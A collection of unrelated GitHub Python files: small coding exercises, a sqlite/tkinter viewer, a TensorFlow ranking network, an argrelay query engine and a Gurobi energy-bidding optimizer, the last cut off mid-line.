+{"seq_id":"30777901591","text":"\ntcases = int(input())\n\nfor x in range(tcases):\n #x starts fro 0 till tcases-1\n N = int(input())\n S = input() #len N --- SOlutions\n U = input() #len N 'N' if not answered the q, otherwise ans\n\n score = 0\n i=0\n while i<= N-1:\n if U[i] == 'N': #not answered see next one\n i+=1\n continue\n elif U[i] == S[i]: #correct answer\n score +=1\n i+=1\n continue\n elif U[i] != S[i]: #incorrect, skip next question\n i+=2\n\n print(score)\n\n\n","repo_name":"SankalppPanghal/Python","sub_path":"q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"30492702489","text":"from __future__ import annotations\n\nimport copy\nimport json\n\nfrom cachetools import TTLCache\nfrom pymongo.collection import Collection\nfrom pymongo.database import Database\n\nfrom argrelay.enum_desc.ReservedArgType import ReservedArgType\nfrom argrelay.misc_helper.ElapsedTime import ElapsedTime\nfrom argrelay.relay_server.QueryCacheConfig import QueryCacheConfig\nfrom argrelay.relay_server.QueryResult import QueryResult\nfrom argrelay.runtime_context.SearchControl import SearchControl\nfrom argrelay.runtime_data.AssignedValue import AssignedValue\nfrom argrelay.schema_config_core_server.StaticDataSchema import data_envelopes_\n\n\nclass QueryEngine:\n\n def __init__(\n self,\n query_cache_config: QueryCacheConfig,\n mongo_db: Database,\n ):\n self.mongo_db: Database = mongo_db\n self.mongo_col: Collection = self.mongo_db[data_envelopes_]\n self.query_cache: TTLCache = TTLCache(\n maxsize = query_cache_config.query_cache_max_size_bytes,\n ttl = query_cache_config.query_cache_ttl_sec,\n )\n self.enable_query_cache: bool = query_cache_config.enable_query_cache\n\n def query_data_envelopes(\n self,\n query_dict: dict,\n ) -> list[dict]:\n \"\"\"\n This query is used for `ServerAction.RelayLineArgs` with\n final invocation for vararg-like multiple `data_envelope`-s (FS_18_64_57_18).\n Therefore, it is not latency-sensitive (results are not cached).\n\n See also `QueryResult.data_envelopes`.\n \"\"\"\n\n query_res = self.mongo_col.find(query_dict)\n return list(iter(query_res))\n\n def query_prop_values(\n self,\n query_dict: dict,\n search_control: SearchControl,\n assigned_types_to_values: dict[str, AssignedValue],\n ) -> QueryResult:\n \"\"\"\n Implements FS_39_58_01_91 query cache (if `enable_query_cache`).\n\n Returned `QueryResult` is used in for `ServerAction.ProposeArgValues` (Tab-completion)\n which makes it latency-sensitive (so the result is cached - see FS_39_58_01_91).\n\n Unlike `QueryEngine.query_data_envelopes` which returns all `data_envelopes` directly,\n `QueryEngine.query_prop_values` populates 0 to 1 envelope only (for performance reasons).\n\n See also `QueryResult.query_data_envelopes` and `QueryResult.data_envelopes`\n \"\"\"\n\n if self.enable_query_cache:\n ElapsedTime.measure(\"before_cache_lookup\")\n query_key = json.dumps(query_dict, separators = (\",\", \":\"))\n query_result = self.query_cache.get(query_key)\n ElapsedTime.measure(\"after_cache_lookup\")\n if query_result:\n return copy.deepcopy(query_result)\n\n query_result = self._query_prop_values(\n assigned_types_to_values,\n query_dict,\n search_control,\n )\n\n self.query_cache[query_key] = copy.deepcopy(query_result)\n else:\n query_result = self._query_prop_values(\n assigned_types_to_values,\n query_dict,\n search_control,\n )\n # No cache -> no deep copy (throw away result):\n return query_result\n\n def _query_prop_values(\n self,\n assigned_types_to_values,\n query_dict,\n search_control,\n ) -> QueryResult:\n\n ElapsedTime.measure(\"before_mongo_find\")\n mongo_result = self.mongo_col.find(query_dict)\n ElapsedTime.measure(\"after_mongo_find\")\n query_result = self._process_prop_values(\n mongo_result,\n search_control,\n assigned_types_to_values,\n )\n ElapsedTime.measure(\"after_process_results\")\n return query_result\n\n @staticmethod\n def _process_prop_values(\n mongo_result,\n search_control: SearchControl,\n assigned_types_to_values: dict[str, AssignedValue],\n ) -> QueryResult:\n \"\"\"\n Process `mongo_result` per types in `search_control` and 
populates `remaining_types_to_values`.\n\n It combines in one loop:\n * counting total `found_count` of `data_envelope`-s returned and\n * storing the last `data_envelope`.\n The last `data_envelope` is only useful when `found_count` is one (making it unambiguous `data_envelope`).\n To search all `data_envelope`, use `query_data_envelopes` function.\n\n Populates:\n * `found_count`\n * `remaining_types_to_values`\n \"\"\"\n\n remaining_types_to_values: dict[str, list[str]] = {}\n data_envelope = None\n data_envelopes = []\n found_count = 0\n\n # TODO: What if search result is huge? Blame data set designer?\n # find all remaining arg vals per arg type:\n for data_envelope in iter(mongo_result):\n found_count += 1\n # `arg_type` must be known:\n for arg_type in search_control.types_to_keys_dict:\n # `arg_type` must be in one of the `data_envelope`-s found:\n if arg_type in data_envelope:\n # If assigned/consumed, `arg_type` must not appear\n # as an option in `remaining_types_to_values` again:\n if arg_type not in assigned_types_to_values:\n arg_vals = scalar_to_list_values(data_envelope[arg_type])\n\n val_list = remaining_types_to_values.setdefault(arg_type, [])\n\n # Deduplicate: ensure unique `arg_value`-s:\n for arg_val in arg_vals:\n if arg_val not in val_list:\n val_list.append(arg_val)\n\n # Populate max one `data_envelope` on prop query for performance reasons:\n if data_envelope is not None:\n data_envelopes.append(data_envelope)\n\n return QueryResult(\n data_envelopes,\n found_count,\n remaining_types_to_values,\n )\n\n\ndef scalar_to_list_values(arg_type_val: list | str) -> list[str]:\n \"\"\"\n FS_06_99_43_60 providing scalar value for list/array field is also possible (and vice versa).\n \"\"\"\n if not isinstance(arg_type_val, list):\n return [arg_type_val]\n else:\n return arg_type_val\n\n\ndef populate_query_dict(envelope_container):\n query_dict = {\n ReservedArgType.EnvelopeClass.name: envelope_container.search_control.envelope_class,\n }\n # FS_31_70_49_15: populate arg values to search from the context:\n for arg_type in envelope_container.search_control.types_to_keys_dict:\n if arg_type in envelope_container.assigned_types_to_values:\n query_dict[arg_type] = envelope_container.assigned_types_to_values[arg_type].arg_value\n return query_dict\n","repo_name":"argrelay/argrelay","sub_path":"src/argrelay/relay_server/QueryEngine.py","file_name":"QueryEngine.py","file_ext":"py","file_size_in_byte":6781,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"}
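The QueryEngine record above caches its latency-sensitive lookup keyed by the serialized query dict, deep-copying on both store and hit so callers cannot mutate cached state. A minimal standalone sketch of that pattern; the backend stub and the sort_keys normalization are assumptions added here (the record relies on a stable key order instead).

import copy
import json
from cachetools import TTLCache

cache = TTLCache(maxsize=1024, ttl=60)  # entries expire after 60 seconds

def fetch_from_backend(query: dict) -> list:
    return [{"echo": query}]  # stand-in for the real (slow) datastore call

def cached_query(query: dict) -> list:
    # dicts are unhashable, so a canonical JSON dump serves as the cache key
    key = json.dumps(query, separators=(",", ":"), sort_keys=True)
    hit = cache.get(key)
    if hit is not None:
        return copy.deepcopy(hit)        # callers must not mutate the cache
    result = fetch_from_backend(query)
    cache[key] = copy.deepcopy(result)
    return result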
+{"seq_id":"45605049858","text":"import sqlite3\nimport tkinter as tk \nfrom tkinter import * \n \ncon = sqlite3.connect('Form.db')\n\ndef sql_fetch(con):\n    cursorObj = con.cursor()\n    cursorObj.execute('SELECT * FROM StudentDetails')\n    rows = cursorObj.fetchall()\n    for row in rows:\n        print(row, end=\"\\n\")\nsql_fetch(con)\n\nprint(end=\"\\n\\n\")\n\n# NOTE: this redefines the sql_fetch above; this version lists the database's tables\ndef sql_fetch(con):\n    cursorObj = con.cursor()\n    cursorObj.execute('SELECT name from sqlite_master where type= \"table\"')\n    print(cursorObj.fetchall()) \nsql_fetch(con)\n\ncursorObj = con.cursor()\n# sqlite3 keeps rowcount at -1 for SELECT statements, so count the fetched rows instead\nprint(len(cursorObj.execute('SELECT * FROM StudentDetails').fetchall()))\n\nprint(end=\"\\n\\n\")\n\nwin = tk.Tk()\nwin.geometry(\"815x250\")\nwin.configure(bg='black')\nwin.title(\"Database of Student Details\")\n\nlabel_0 = Label(win, text=\"Student Details Table\",bg='black', fg='white', width=20,font=(\"bold\", 30))\nlabel_0.place(x=200, y=70)\n\nprint(end=\"\\n\\n\")\n\nmy_connect = sqlite3.connect('Form.db')\nmy_conn = my_connect.cursor()\n\nmy_conn.execute(\"SELECT * FROM StudentDetails\")\ni=0 \nfor StudentDetails in my_conn: \n    for j in range(len(StudentDetails)):\n        e = Entry(win, width=10, bg='black', fg='white') \n        e.grid(row=i, column=j) \n        e.insert(END, StudentDetails[j])\n    i=i+1\nwin.mainloop()\n","repo_name":"kanch91/Python-Project","sub_path":"Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
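As noted in the record above, sqlite3 keeps cursor.rowcount at -1 for queries, so counting has to be explicit. A small sketch of the usual COUNT(*) form, using an in-memory database with made-up rows:

import sqlite3

con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE StudentDetails (name TEXT)")
con.executemany("INSERT INTO StudentDetails VALUES (?)", [("Ada",), ("Alan",)])

# rowcount is only meaningful for INSERT/UPDATE/DELETE in sqlite3;
# for SELECT, ask the database to count instead:
(n_rows,) = con.execute("SELECT COUNT(*) FROM StudentDetails").fetchone()
print(n_rows)  # -> 2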
+{"seq_id":"2162077094","text":"import tensorflow as tf\n\nlayers = tf.keras.layers\n\n\nclass EvaluateNetwork(tf.keras.Model):\n def __init__(self):\n super().__init__()\n self.conv2d_1 = layers.Conv2D(filters=32, kernel_size=5,\n padding='same', activation='relu')\n\n self.pool2d_1 = layers.MaxPool2D(pool_size=2, strides=2)\n\n self.conv2d_2 = layers.Conv2D(filters=64, kernel_size=5,\n padding='same', activation='relu')\n\n self.pool2d_2 = layers.MaxPool2D(pool_size=2, strides=2)\n\n self.flatten = layers.Flatten()\n\n self.dense_1 = layers.Dense(units=1024, activation='relu')\n\n self.dropout = layers.Dropout(rate=0.5)\n\n self.dense_2 = layers.Dense(units=1)\n\n def call(self, inputs, training=False):\n x = self.conv2d_1(inputs)\n x = self.pool2d_1(x)\n x = self.conv2d_2(x)\n x = self.pool2d_2(x)\n x = self.flatten(x)\n x = self.dense_1(x)\n if training:\n x = self.dropout(x, training)\n return self.dense_2(x)\n\n\nif __name__ == \"__main__\":\n net = EvaluateNetwork()\n\n input_shape = (32, 32, 3)\n\n left_input = tf.keras.Input(shape=input_shape)\n right_input = tf.keras.Input(shape=input_shape)\n\n x = net(left_input)\n y = net(right_input)\n\n combined = tf.keras.Model(inputs=[left_input, right_input], outputs=[x, y])\n combined.summary()\n","repo_name":"purin52002/GenerateImageFromUserPreference","sub_path":"ranknet/model/evaluate_network.py","file_name":"evaluate_network.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
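The __main__ block above scores a left and a right input with the same shared-weight network, the usual two-tower setup for pairwise preference learning (the repo path mentions ranknet). The record stops at the model summary; the loss below is the standard RankNet pairing one would typically attach, shown as a hedged sketch rather than the project's actual training code.

import tensorflow as tf

def ranknet_loss(score_left, score_right, label):
    """Pairwise preference loss: label is 1.0 when the left item is
    preferred, 0.0 when the right one is (RankNet-style)."""
    logit = score_left - score_right  # P(left preferred) = sigmoid(logit)
    return tf.reduce_mean(
        tf.nn.sigmoid_cross_entropy_with_logits(labels=label, logits=logit))

# toy check: a higher-scored preferred item yields a small loss (~0.20)
left, right = tf.constant([[2.0]]), tf.constant([[0.5]])
print(float(ranknet_loss(left, right, tf.constant([[1.0]]))))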
+{"seq_id":"9177462525","text":"lst = list(map(int,input().split()))\nN = len(lst)\nhalf = N//2\nif(N==3 and half == 1): #for cases where length of the list is 3 and we have a value repeating twice\n    half =2\n\nfor i in range(N):\n    count = 0\n    x = lst[i]\n    for j in range(i,N):\n        if(lst[j] == x):\n            count +=1\n    \n    if(count>=half):\n        print(lst[i])\n        break # print the element once; without this, values repeated later would be printed again\n    \n\n\n","repo_name":"tg270798/daily-coding-problem","sub_path":"problem_155.py","file_name":"problem_155.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
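The solution above recounts occurrences from every index, which is O(n^2), and its half adjustment is fragile. The classic O(n) answer to the majority-element problem is the Boyer-Moore vote, sketched below with a confirming second pass:

def majority_element(nums):
    """Boyer-Moore majority vote: O(n) time, O(1) extra space."""
    candidate, votes = None, 0
    for x in nums:
        if votes == 0:
            candidate = x
        votes += 1 if x == candidate else -1
    # the vote only yields a candidate; verify it is a strict majority
    if nums.count(candidate) > len(nums) // 2:
        return candidate
    return None

assert majority_element([1, 2, 1, 1, 3, 1]) == 1
assert majority_element([1, 2, 3]) is None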
+{"seq_id":"26875615602","text":"\n\ndef search(list,n):\n    l = 0 # l is the lower bound: the first index of the list\n    u = len(list)-1 # u is the upper bound: the last index of the list\n    while l <= u :\n        mid = (l+u)//2 # \"//\" is integer division, so mid is an int\n        if list[mid] == n:\n            globals() ['pos'] = mid \n            return True\n        else:\n            if list[mid] < n:\n                l = mid + 1 # exclude mid so the interval always shrinks (l = mid can loop forever)\n            else:\n                u = mid - 1 # likewise exclude mid on the upper side\n\nlist = [4,7,8,12,45,99]\nn = 45\nif search( list,n ):\n    print(\"found at \",pos+1)\nelse:\n    print(\"not found\")\n","repo_name":"aungkyaw718/alogrithm","sub_path":"BinarySearch.py","file_name":"BinarySearch.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
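With the bounds fixed as above (l = mid + 1 / u = mid - 1) the loop is guaranteed to terminate. For comparison, the standard library's bisect module gives the same search without hand-rolled bounds; the wrapper below is a sketch, not part of the record:

import bisect

def index_of(sorted_list, value):
    """Return the index of value in a sorted list, or None if absent."""
    i = bisect.bisect_left(sorted_list, value)
    if i < len(sorted_list) and sorted_list[i] == value:
        return i
    return None

assert index_of([4, 7, 8, 12, 45, 99], 45) == 4
assert index_of([4, 7, 8, 12, 45, 99], 5) is None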
+{"seq_id":"40950002089","text":"from dato import Dato\n\ndef hovedprogram():\n    \"\"\"The main program checks that the Dato class works as intended\"\"\"\n\n    # Create a Dato object\n    min_bursdag = Dato(31, 12, 2004)\n\n    # Print the year\n    print(min_bursdag.hent_aar())\n\n    # Store the date in a variable and split it into a list\n    dato = min_bursdag.hent_dato()\n    dato_sortert = dato.split(\".\")\n\n    # Check whether the day is the 15th of the month\n    if dato_sortert[0] == \"15\":\n        print(\"Loenningsdag!\")\n    # Check whether the day is the 1st of the month\n    elif dato_sortert[0] == \"1\":\n        print(\"Ny maaned, nye muligheter\")\n    \n    # Print the date\n    print(dato)\n    \n    # Check whether the date is the 31st\n    if min_bursdag.sjekk_dag(31):\n        print(\"Dagen stemmer\")\n    else:\n        print(\"Dagen stemmer ikke\")\n    \n    # Call the neste_dag() method to advance the date to the next day\n    min_bursdag.neste_dag()\n    # Print the new date\n    print(min_bursdag.hent_dato())\n\n    # Compare the given date with the constructor's date: 0 means equal, 1 means before, anything else means after\n    dato_for_etter = min_bursdag.for_eller_etter(\"1.1.2004\")\n    \n    if dato_for_etter == 0:\n        print(\"Datoene er like\")\n    elif dato_for_etter == 1:\n        print(\"Datoen er før\")\n    else:\n        print(\"Datoen er etter\")\n\n# Call the main program\nhovedprogram()","repo_name":"Sondremi/IN1000-obliger-H23","sub_path":"Oblig6/test_dato.py","file_name":"test_dato.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"9185301177","text":"# -*- coding: UTF-8 -*-\n\nimport math\nimport os\nimport time\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport gurobipy as gp\nfrom gurobipy import GRB\n\nclass Planner():\n \"\"\"\n MILP Electricity dad bidding formulation.\n \"\"\"\n\n def __init__(self, scenarios:dict, prices:dict, x:np.array=None, curtail:bool=True, soc_max:float=1):\n \"\"\"\n Init the planner.\n \"\"\"\n\n self.pv_scenarios = scenarios['PV'] # (MW) (n_s, n_periods)\n self.wind_scenarios = scenarios['W'] # (MW) (n_s, n_periods)\n self.load_scenarios = scenarios['L'] # (MW) (n_s, n_periods)\n self.nb_scenarios = self.pv_scenarios.shape[0]\n self.s_set = range(self.nb_scenarios)\n self.x = x # (MW)\n self.curtail = curtail\n\n self.period_hours = 1 # (hour)\n self.nb_periods = self.pv_scenarios.shape[1]\n self.t_set = range(self.nb_periods)\n\n self.dad_prices = prices['dad'] # (euros/MWh) (n_periods,)\n self.imb_pos_prices = prices['imb +'] # (euros/MWh) (n_periods,)\n self.imb_neg_prices = prices['imb -'] # (euros/MWh) (n_periods,)\n\n # BESS parameters\n self.soc_max = soc_max\n self.charge_power = self.soc_max / 2\n self.discharge_power = self.soc_max / 2\n self.soc_min = 0\n self.charge_eff = 0.95\n self.discharge_eff = 0.95\n self.soc_ini = 0\n self.soc_end = 0\n\n self.time_building_model = None\n self.time_solving_model = None\n\n # Create model\n self.model = self.create_model()\n\n # Solve model\n self.solver_status = None\n\n def create_model(self):\n \"\"\"\n Create the optimization problem.\n \"\"\"\n t_build = time.time()\n\n # -------------------------------------------------------------------------------------------------------------\n # 1. create model\n model = gp.Model(\"planner_dad\")\n\n # -------------------------------------------------------------------------------------------------------------\n # 2. 
create variables\n # 2.1 First-stage variables -> x = dad bidding\n x = model.addVars(self.nb_periods, lb=-1000, ub=1000, obj=0, vtype=GRB.CONTINUOUS, name=\"x\") # Retailer position (injection > 0, withdrawal < 0) (MWh)\n if self.x is not None:\n for t in self.t_set:\n x[t].setAttr(\"ub\", self.x[t])\n x[t].setAttr(\"lb\", self.x[t])\n\n # 2.2 Second-stage variables -> y = realisation of the random variables in scenarios omega\n y = model.addVars(self.nb_scenarios, self.nb_periods, lb=-1000, ub=1000, obj=0, vtype=GRB.CONTINUOUS, name=\"y\") # Retailer position in scenario s (injection > 0, withdrawal < 0) (MWh)\n y_short = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_short\") # Retailer position in short in scenario s y_short >= (x - y) (MWh)\n y_long = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_long\") # Retailer position in long in scenario s y_long >= (y - x) (MWh)\n\n y_PV = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_PV\") # PV generation in scenario s (MW)\n y_W = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_W\") # Wind generation in scenario s (MW)\n y_L = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_L\") # Load generation in scenario s (MW)\n\n y_s = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_s\") # BESS state of charge in scenario s (MWh)\n y_cha = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_cha\") # BESS charging power in scenario s (MW)\n y_dis = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_dis\") # BESS discharging power in scenario s (MW)\n y_b = model.addVars(self.nb_scenarios, self.nb_periods, obj=0, vtype=GRB.BINARY, name=\"y_b\") # BESS binary variable to prevent from charging or discharging simultaneously in scenario s (-)\n\n # -------------------------------------------------------------------------------------------------------------\n # 3. 
Objective: maximize the IJF_paper profit\n # -------------------------------------------------------------------------------------------------------------\n # Maximization of the expected profit over all scenarios s with an equal probability\n # -> the dad prices are assumed to be equal to the expected value for a given time periocd t: dad_prices_t = E[dad_prices_{t,s}]\n # -> the pos imb prices are assumed to be equal to the expected value: imb_pos_prices_t = E[imb_pos_prices_{t,s}]\n # -> the neg imb prices are assumed to be equal to the expected value: imb_neg_prices_t = E[imb_neg_prices_{t,s}]\n\n # max sum_t [sum_s alpha_s {self.dad_prices[t] * y[s,t] -(self.imb_neg_prices[t] * y_short[s,t] + self.imb_pos_prices[t] * y_long[s,t]) }]\n\n dad_profit = gp.quicksum(self.dad_prices[t] * x[t] for t in self.t_set)\n short_penalty = gp.quicksum(gp.quicksum(self.imb_neg_prices[t] * y_short[s,t] for s in self.s_set)/self.nb_scenarios for t in self.t_set)\n long_penalty = gp.quicksum(gp.quicksum(self.imb_pos_prices[t] * y_long[s,t] for s in self.s_set)/self.nb_scenarios for t in self.t_set)\n\n model.setObjective(dad_profit - (short_penalty + long_penalty), GRB.MAXIMIZE)\n\n # -------------------------------------------------------------------------------------------------------------\n # 4. create constraints\n\n # Second-stage constraints\n # Energy balance equation\n model.addConstrs((y[s,t] - self.period_hours * (y_PV[s,t] + y_W[s,t] + y_dis[s,t] - y_cha[s,t]) + y_L[s,t] == 0 for s in self.s_set for t in self.t_set), name='c_balance')\n\n # Short position cst\n model.addConstrs((y_short[s,t] >= (x[t] - y[s,t]) for s in self.s_set for t in self.t_set), name='c_short')\n # Long position cst\n model.addConstrs((y_long[s,t] >= (y[s,t] - x[t]) for s in self.s_set for t in self.t_set), name='c_long')\n\n # Generation & load cst\n if self.curtail:\n model.addConstrs((y_PV[s,t] <= self.pv_scenarios[s,t] for s in self.s_set for t in self.t_set), name='c_PV')\n model.addConstrs((y_W[s,t] <= self.wind_scenarios[s,t] for s in self.s_set for t in self.t_set), name='c_W')\n else:\n model.addConstrs((y_PV[s,t] == self.pv_scenarios[s,t] for s in self.s_set for t in self.t_set), name='c_PV')\n model.addConstrs((y_W[s,t] == self.wind_scenarios[s,t] for s in self.s_set for t in self.t_set), name='c_W')\n model.addConstrs((y_L[s,t] == self.load_scenarios[s,t] for s in self.s_set for t in self.t_set), name='c_L')\n\n # BESS constraints\n # max charge cst\n model.addConstrs((y_cha[s,t] <= y_b[s,t] * self.charge_power for s in self.s_set for t in self.t_set), name='c_max_charge')\n # max discharge cst\n model.addConstrs((y_dis[s,t] <= (1 - y_b[s,t]) * self.discharge_power for s in self.s_set for t in self.t_set), name='c_max_discharge')\n # min soc cst\n model.addConstrs((y_s[s,t] >= self.soc_min for s in self.s_set for t in self.t_set), name='c_min_s')\n # min soc cst\n model.addConstrs((y_s[s,t] <= self.soc_max for s in self.s_set for t in self.t_set), name='c_max_s')\n\n # BESS dynamics first period\n model.addConstrs((y_s[s,0] - self.period_hours * (self.charge_eff * y_cha[s,0] - y_dis[s,0] / self.discharge_eff) == self.soc_ini for s in self.s_set), name='c_BESS_first_period')\n # BESS dynamics from second to last periods\n model.addConstrs((y_s[s,t] - y_s[s,t-1]- self.period_hours * (self.charge_eff * y_cha[s,t] - y_dis[s,t] / self.discharge_eff) == 0 for s in self.s_set for t in range(1, self.nb_periods)), name='c_BESS_dynamics')\n # BESS dynamics last period\n model.addConstrs((y_s[s, self.nb_periods-1] == 
self.soc_end for s in self.s_set), name='c_BESS_last_period')\n\n # -------------------------------------------------------------------------------------------------------------\n # 5. Store variables\n self.allvar = dict()\n self.allvar['x'] = x\n self.allvar['y'] = y\n self.allvar['y_short'] = y_short\n self.allvar['y_long'] = y_long\n self.allvar['y_PV'] = y_PV\n self.allvar['y_W'] = y_W\n self.allvar['y_L'] = y_L\n self.allvar['y_cha'] = y_cha\n self.allvar['y_dis'] = y_dis\n self.allvar['y_s'] = y_s\n self.allvar['y_b'] = y_b\n\n self.time_building_model = time.time() - t_build\n # print(\"Time spent building the mathematical program: %gs\" % self.time_building_model)\n\n return model\n\n def solve(self, LogToConsole:bool=False, logfile:str=\"\", Threads:int=0, MIPFocus:int=0, TimeLimit:float=GRB.INFINITY):\n\n t_solve = time.time()\n\n self.model.setParam('LogToConsole', LogToConsole) # no log in the console if set to False\n # self.model.setParam('OutputFlag', outputflag) # no log into console and log file if set to True\n # self.model.setParam('MIPGap', 0.01)\n self.model.setParam('TimeLimit', TimeLimit)\n self.model.setParam('MIPFocus', MIPFocus)\n # self.model.setParam('DualReductions', 0) # Model was proven to be either infeasible or unbounded. To obtain a more definitive conclusion, set the DualReductions parameter to 0 and reoptimize.\n\n # If you are more interested in good quality feasible solutions, you can select MIPFocus=1.\n # If you believe the solver is having no trouble finding the optimal solution, and wish to focus more attention on proving optimality, select MIPFocus=2.\n # If the best objective bound is moving very slowly (or not at all), you may want to try MIPFocus=3 to focus on the bound.\n\n self.model.setParam('LogFile', logfile) # no log in file if set to \"\"\n self.model.setParam('Threads', Threads) # Default value = 0 -> use all threads\n\n self.model.optimize()\n self.solver_status = self.model.status\n self.time_solving_model = time.time() - t_solve\n\n def store_solution(self):\n\n m = self.model\n\n solution = dict()\n solution['status'] = m.status\n if solution['status'] == 2 or solution['status'] == 9:\n solution['obj'] = m.objVal\n\n # 1 dimensional variables\n for var in ['x']:\n solution[var] = [self.allvar[var][t].X for t in self.t_set]\n\n # 2 dimensional variables\n for var in ['y', 'y_short', 'y_long', 'y_PV', 'y_W', 'y_L', 'y_dis', 'y_cha', 'y_s', 'y_b']:\n solution[var] = [[self.allvar[var][s, t].X for t in self.t_set] for s in self.s_set]\n\n solution['dad_profit'] = sum([solution['x'][t] * self.dad_prices[t] for t in self.t_set])\n solution['short_penalty'] = sum([sum([solution['y_short'][s][t] * self.imb_neg_prices[t] for t in self.t_set]) for s in self.s_set]) / self.nb_scenarios\n solution['long_penalty'] = sum([sum([solution['y_long'][s][t] * self.imb_pos_prices[t] for t in self.t_set]) for s in self.s_set]) / self.nb_scenarios\n solution['obj2'] = solution['dad_profit'] - (solution['short_penalty'] + solution['long_penalty'])\n else:\n print('WARNING model is not OPTIMAL')\n solution['obj'] = math.nan\n\n # 3. 
Timing indicators\n solution[\"time_building\"] = self.time_building_model\n solution[\"time_solving\"] = self.time_solving_model\n solution[\"time_total\"] = self.time_building_model + self.time_solving_model\n\n return solution\n\n def export_model(self, filename):\n \"\"\"\n Export the pyomo model into a cpxlp format.\n :param filename: directory and filename of the exported model.\n \"\"\"\n\n self.model.write(\"%s.lp\" % filename)\n # self.model.write(\"%s.mps\" % filename)\n\n\nif __name__ == \"__main__\":\n # Set the working directory to the root of the project\n print(os.getcwd())\n\n dir_path = '../../../elia_case_study/bidding/export/dad_bidding/'\n if not os.path.isdir(dir_path): # test if directory exist\n os.makedirs(dir_path)\n\n soc_max = 500\n\n q_pos = 2\n q_neg = 2\n\n dad_price = 100 # euros /MWh\n # pos_imb = neg_imb = q * dad_price # euros /MWh\n pos_imb = q_pos * dad_price # euros /MWh\n neg_imb = q_neg * dad_price # euros /MWh\n gamma = (dad_price + pos_imb) / (pos_imb + neg_imb)\n print('dad_price %s pos_imb %s neg_imb %s GAMMA %s' % (dad_price, pos_imb, neg_imb, gamma))\n\n # load data\n df_gen = pd.read_csv('../../../elia_case_study/data/generation.csv', parse_dates=True, index_col=0)\n df_load = pd.read_csv('../../../elia_case_study/data/load.csv', parse_dates=True, index_col=0)\n df_dad = pd.read_csv('../../../elia_case_study/data/dad.csv', parse_dates=True, index_col=0)\n df_imb = pd.read_csv('../../../elia_case_study/data/imb.csv', parse_dates=True, index_col=0)\n\n nb_scenarios = 5\n pv = df_gen['PV true']['2020-1-1':'2020-1-'+str(nb_scenarios)]\n wind = df_gen['W on true']['2020-1-1':'2020-1-' + str(nb_scenarios)]\n load = 0.05 * df_load['load true']['2020-1-1':'2020-1-' + str(nb_scenarios)]\n\n # 20 scenarios\n scenarios = dict()\n scenarios['PV'] = pv.values.reshape(nb_scenarios,24)\n scenarios['W'] = wind.values.reshape(nb_scenarios, 24)\n scenarios['L'] = load.values.reshape(nb_scenarios, 24)\n\n # Plot point forecasts vs observations\n FONTSIZE = 10\n plt.figure()\n net = pv.values + wind.values - load.values\n plt.plot(pv.values, label='PV')\n plt.plot(wind.values, label='W on')\n plt.plot(load.values, label='Load')\n plt.plot(net, 'r', label='net')\n plt.ylabel('MW', fontsize=FONTSIZE, rotation='horizontal')\n plt.xticks(fontsize=FONTSIZE)\n plt.yticks(fontsize=FONTSIZE)\n plt.legend(fontsize=FONTSIZE)\n plt.tight_layout()\n plt.show()\n\n prices = dict()\n prices['dad'] = np.asarray([dad_price]*16+[3*dad_price]*4+[dad_price]*4)\n prices['imb +'] = np.asarray([pos_imb]*16+[3*pos_imb]*4+[pos_imb]*4)\n prices['imb -'] = np.asarray([neg_imb]*16+[3*neg_imb]*4+[neg_imb]*4)\n\n # prices = dict()\n # prices['dad'] = df_dad['2020-1-3'].values.reshape(-1)\n # prices['imb +'] = q_pos * df_dad['2020-1-3'].values.reshape(-1)\n # prices['imb -'] = q_neg * df_dad['2020-1-3'].values.reshape(-1)\n\n plt.figure()\n plt.plot(prices['dad'], label='dad')\n plt.plot(prices['imb -'] , label='imb neg')\n plt.ylabel('€/MWh', fontsize=FONTSIZE, rotation='horizontal')\n plt.xticks(fontsize=FONTSIZE)\n plt.yticks(fontsize=FONTSIZE)\n plt.legend(fontsize=FONTSIZE)\n plt.tight_layout()\n plt.show()\n\n # Dad planner\n planner = Planner(scenarios=scenarios, prices=prices, soc_max=soc_max)\n planner.export_model(dir_path + 'planner_dad')\n planner.solve()\n sol_planner = planner.store_solution()\n #\n print('profit %.2f k€ dad bid %.2f short penalty %.2f k€ long penalty %.2f k€' % (sol_planner['obj'] / 1000, sol_planner['dad_profit'] / 1000, sol_planner['short_penalty'] / 1000, 
